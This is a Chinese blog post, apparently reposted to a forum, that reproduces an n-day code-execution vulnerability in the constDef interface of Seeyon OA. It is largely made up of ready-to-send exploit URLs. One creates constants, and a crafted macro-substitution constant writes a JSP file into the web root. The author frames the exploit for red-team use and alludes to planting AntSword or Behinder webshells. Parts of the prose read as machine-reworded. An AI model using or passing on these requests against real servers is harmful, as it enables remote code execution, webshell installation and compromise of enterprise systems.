[漏洞复现]致远在野nday constDef接口存在代码实行漏洞
假如觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。炒个冷饭,虽然是个23年hw爆出来的洞,但是网上没有公开利用的信息,而且在hw中共同致远的权限绕过也成功过几次,感觉能打的还是有一些的。
https://i-blog.csdnimg.cn/direct/f6cdad9a6f6c479a81980d371796bec4.png
https://i-blog.csdnimg.cn/direct/170add811dfe4ab08f80af81e0deb320.png
漏洞简介
致远OA是一款面向企业的办公自动化软件,设计理念是以人为中心,提供全面的协同办公办理方案。它由北京致远互联软件股份有限公司开发,自2002年成立以来,致力于提供协同办公产品的设计、研发、销售及服务。致远OA不仅支持根本的办公自动化功能,如流程审批、信息共享和文档处理,还提供了高级功能如移动办公和集成第三方系统,以适应差异规模企业的需求。攻击者可通过代码实行漏洞获取服务器权限。
漏洞复现
起首新建一个常量,constKey(常量名)为demo。
/seeyon/constDef.do?method=newConstDef&constKey=demo&constDefine=1&constDescription=123&constType=4
https://i-blog.csdnimg.cn/direct/ce3865290bc8489692112522218fd380.png
可以通过如下接口查看常量是否新建完成。
/seeyon/ajax.do?method=ajaxAction&managerName=constDefManager&rnd=123123123&managerMethod=listPage&arguments=%5B%7B%22page%22%3A1%2C%22size%22%3A20%7D%2C%7B%7D%5D
https://i-blog.csdnimg.cn/direct/d8c673a879e84c4d89aa4c04b46f0f11.png
再新建一个常量,constType值为4表示常量类型为宏替换,在constDefine(常量界说)中引用常量demo,构造闭合造成代码实行。
/seeyon/constDef.do?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22../webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder().decode(%22PCVvdXQucHJpbnRsbigiMjEzMjEzIik7JT4=%22)));%22&constDescription=123&constType=4
https://i-blog.csdnimg.cn/direct/6d0f74189fc542be813eb5b671850a6e.png
https://i-blog.csdnimg.cn/direct/03ae8b39868c49609780f95bb10f0a81.png
大概要运行2次才气成功,写入1111.jsp文件。
https://i-blog.csdnimg.cn/direct/f98652d7f96b4e93bb2df34d44fa2c0b.png
漏洞复现就如许。假如师傅们在实战中利用过就会知道,常规的蚁剑、冰蝎等webshell管理工具的jsp马在写入的过程中由于太长而写不进去,这个问题就留给师傅们思考,我这边具体方法就放在星球。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]